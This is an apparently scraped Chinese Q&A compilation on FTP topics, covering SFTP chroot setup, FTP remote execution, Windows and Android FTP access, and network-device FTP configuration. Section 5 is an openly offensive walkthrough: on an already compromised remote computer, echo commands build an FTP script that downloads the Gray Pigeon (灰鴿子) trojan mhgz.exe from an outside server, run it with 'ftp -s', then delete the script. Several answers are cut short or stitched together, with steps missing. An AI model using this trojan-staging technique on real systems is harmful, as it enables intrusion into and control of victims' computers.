ftp遠程文件
眾所周知SFTP賬號是基於SSH賬號的,所以在默認情況下訪問伺服器的許可權是非常大的。下面為SFTP用戶許可權設置方法。
必要條件:
你的openssh-server版本至少得失4.8p1, 因為配置許可權需要版本添加的新配置項ChrootDirectory來完成。
如何查看自己伺服器上的ssh版本?大家可以嘗試以下命令:
$ ssh -V
具體實施步驟:
1. 我們需要創建一個用戶組,專門用於sftp用戶
$ groupadd sftpusers
2. 我們創建一個用戶test
$ useradd -s /bin/false -G sftpuser test
注意這里我們將test用戶的shell設置為/bin/false使他沒有登陸shell的許可權
3. 編輯 /etc/ssh/sshd_config
找到Subsystem這個配置項,將其修改為
Subsystem sftp internal-sftp
然後再到文件最尾處增加配置設定屬於用戶組sftpusers的用戶都只能訪問他們自己的home文件夾
Match Group sftpusers
ChrootDirectory %h
ForceCommand internal-sftp
AllowTcpForwarding no
保存並關閉文件
4. 修改test用戶home文件夾的許可權,讓其屬於root用戶
chown root ~test
5. 重啟sshd服務
$ service sshd restart
6. 測試用戶賬號
$ ssh test@localhost
連接會被拒絕或者無法登陸
$ sftp tesst@localhost
登陸後你會發現你的賬號無法切換到除自己home目錄之外的地方的
常見問題:
如果你鏈接伺服器的時候出現下面的提示:
Write failed: Broken pipe
Couldn't read packet: Connection reset by peer
這個問題的原因是ChrootDirectory的許可權問題,你設定的目錄必須是root用戶所有,否則就會出現問題。所以請確保sftp用戶根目錄的所有人是root, 許可權是 750 或者 755。
2. 命令行登錄FTP下,如何遠程執行伺服器上的可執行文件不是在本機執行,而是遠程執行,命令是什麼呢。求高
ftp是可以遠程執行文件的,前提條件是你登陸的用戶擁有「執行」許可權,具體命令是:
quote
site
exec
*.exe
(你要執行的exe文件,bat也可以)。
說ftp不能執行是對ftp協議本身不夠了解,其實用過ftp伺服器端軟體(例如serv-u)的人一定注意過,在設置用戶許可權的時候有一項是「執行」,如果這一項選中,那麼本用戶就擁有了執行遠程伺服器程序的許可權。然而使用很多ftp客戶端軟體執行命令的時候都是在本地執行的,所以讓很多人誤解ftp不能在遠程執行,這是客戶端軟體的問題,與ftp協議無關。所以用以上命令在命令行是能夠在遠程計算機執行命令的。
另外說ftp執行是漏洞,這也是片面的。實際應該是ftp協議本身提供執行的命令,但是這本身是非常不安全的,做為操作系統(甚至所有伺服器端軟體)應該將這種許可權設為對一般客戶不可見。只有特殊許可權的用戶才能訪問,這樣才是軟體本身應提供的功能。
3. 安卓手機如何通過ftp遠程連接電腦,並傳輸文件。
安卓手機通過ftp遠程連接電腦,並傳輸文件步驟如下:
1、網路搜索FileZilla進行下載。
4. win7 如何象本地目錄一樣打開遠程ftp文件
win7像本地目錄一樣打開遠程ftp文件方法:
1.
首先打開電腦右下角的開始菜單,選擇裡面的設置菜單,然後選擇控制面板。
2.
選擇internet選項。右邊的高級菜單。
3.
選擇啟用ftp文件夾視圖即可,然後就可遠程查看。
5. 遠程計算機怎麼用FTP傳文件啊
在遠程計算機的cmd環境下,如果不能通過ipc$渠道傳送文件,那就只有通過ftp下載文件了。
假設我們已經有一個ftp伺服器,上面有一個我們配置好的灰鴿子木馬文件mhgz.exe,我們應該知道ftp伺服器的三個參數:
1、ftp伺服器的ip地址:如203.75.44.34
2、ftp伺服器的用戶名:如tty
3、ftp伺服器的密
碼:如tty123
在遠程計算機的cmd下依次輸入下面的命令:
1、echo
open
203.75.44.34>>tty.txt
登陸ftp伺服器
2、echo
tty>>tty.txt
用戶名
3、echo
tty123>>tty.txt
密碼
4、echo
bin>>tty.txt
開始
5、echo
get
mhgz.exe>>tty.txt
下載灰鴿子木馬
6、echo
bye>>tty.txt
關閉ftp伺服器
輸入上面命令後,在遠程計算機上就會生成一個tty.txt文件,內容為:
open
203.75.44.34
tty
tty123
bin
get
mhgz.exe
bye
現在我們在遠程計算機上執行下面的命令:
ftp
-s:tty.txt
意思是,讀取tty.txt里的參數,執行ftp命令,命令執行完後,灰鴿子木馬文件mhgz.exe就下載到對方計算機里了。
del
c:\tty.txt
6. 怎麼把本地文件傳到遠程ftp
1、首先需要在本地設置一個FTP站點
(1)我的電腦——》管理——》本地用戶和組——》用戶——》新增用戶,即設置FTP登錄的用戶名和密碼
(5)最後就可以測試剛才建立的ftp伺服器是否建立成功了。在瀏覽器上輸入以下地址ftp://設置站點時ip(在此為本地ip) 即可打開具有上傳功能的FTP頁面,輸入ftp://設置站點時ip(在此為本地ip):2121即可打開只有下載功能的頁面了!當然,登錄之前還需要你輸入開始建立的那個賬號及密碼:用戶名為:。密碼為:XXXXXX
這樣你需要建立的ftp伺服器就建立成功了
7. FTP原理與配置
FTP是用來傳送文件的協議。使用FTP實現遠程文件傳輸的同時,還可以保證數據傳輸的可靠性和高效性。
在企業網路中部署一台FTP伺服器,將網路設備配置為FTP客戶端,則可以使用FTP來備份或更新VRP文件和配置文件。 也可以把網路設備配置為FTP伺服器,將設備的日誌文件保存到某台主機上方便查看。
FTP傳輸數據時支持兩種傳輸模式:ASCII模式和二進制模式。
ASCII模式用於傳輸文本。 發送端的字元在發送前被轉換成ASCII碼格式之後進行傳輸,接收端收到之後再將其轉換成字元。 二進制模式常用於發送圖片文件和程序文件。 發送端在發送這些文件時無需轉換格式,即可傳輸。
使用FTP進行文件傳輸時,會使用兩個TCP連接。 第一個連接是FTP客戶端和FTP伺服器間的控制連接。 FTP伺服器開啟21號埠 ,等待FTP客戶端發送連接請求。
第二個連接是FTP客戶端和FTP伺服器間的數據連接。 伺服器使用TCP的20號埠 與客戶端建立數據連接。 通常情況下,伺服器主動建立或中斷數據連接。
執行 ftp server enable 命令使能FTP功能。
執行 set default ftp-directory 命令設置FTP用戶。
在配置FTP伺服器時,可以使用AAA為每個用戶分別配置登錄賬號和訪問許可權。
aaa 命令用來進入AAA視圖。
local-user user-name { access-limit max-number | ftpdirectory directory | idle-timeout minutes [ seconds ] | password cipher password [ opt ]| privilege level level | state {active | block } } *命令用來創建本地用戶,並配置本地用戶的各項參數。
ftp客戶端連接ftp伺服器
ftp命令用來不遠程FTP伺服器建立控制連接,並進入FTP客戶端視圖。
binary命令用來在設備作為FTP客戶端時設置文件傳輸方式為Binary模式,又稱二進制模式。預設情況下,文件傳輸方式為ASCII模式。get命令用來從遠程FTP伺服器下載文件並保存在本地。
8. ftp怎麼登錄連接
ftp怎麼登錄連接
在windows系統中,我們可以通過登錄連接ftp的方法進行遠程文件的轉移和操作,還可以與好友或其他設備共享文件,那麼ftp怎麼登錄連接呢,其實只要輸入地址即可。
5、登錄連接完成後,就能查看和編輯其中的文件了。